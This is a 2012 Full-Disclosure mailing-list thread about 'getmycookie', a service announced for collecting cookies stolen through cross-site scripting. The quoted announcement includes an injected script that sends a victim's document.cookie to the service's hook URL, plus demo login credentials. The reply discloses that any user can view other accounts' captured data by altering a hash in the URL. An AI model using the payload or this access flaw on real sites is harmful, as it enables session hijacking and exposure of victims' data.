Re: [OT] New online service to make XSSs easier

[karniv0re <karniv0re () null co in>]

And this is anonymous.. How??

Oh and I was also wondering how come I can see accounts created by other
users, using a static url like so:
http://www.getmycookie.com/view.m3?hash=<insert_hash_here>

Login as anybody and navigate here, to see that you are definitely not in
your own account:
http://www.getmycookie.com/view.m3?hash=bc010e11ae988eca4ea1d98d5c8014138fa0cf9ccaab457094

Regards,
karniv0re

On Mon, May 7, 2012 at 2:02 AM, Manu <sourvivor () gmail com> wrote:

> Hello,
>
> I just would like you to know a new service that I want to publish. Its
> called 'getmycookie' (www.getmycookie.com) and is going to be a service
> to make easier to perform XSS attacks.
>
> The website allow users to store there their extracted data from XSS's.
> For example, if you are a user of getmycookie you could inject a xss as:
>
> <script>document.writr('<img src="
> http://getmycookie.com/hook.m3?hash=8f1c52809a3c3517820727961e277c4d397ba7019258e7a373&value="&apos;
> +  document.cookie + '>');</script>.
>
> It would be stored into a database ('value' parameter) and it could be
> obtained through the control panel of the user that owns the hash
> '8f1c52809a3c3517820727961e277c4d397ba7019258e7a373'. (username: demo,
> password: demo).
>
> Is easy, fast, anonymous and you don't need to give any information about
> you, just an username and password.
>
> Greetings
>
> --
> /Manu~
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
> --
> Regards,
> Riyaz Walikar
>
>  <http://secunia.com/>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/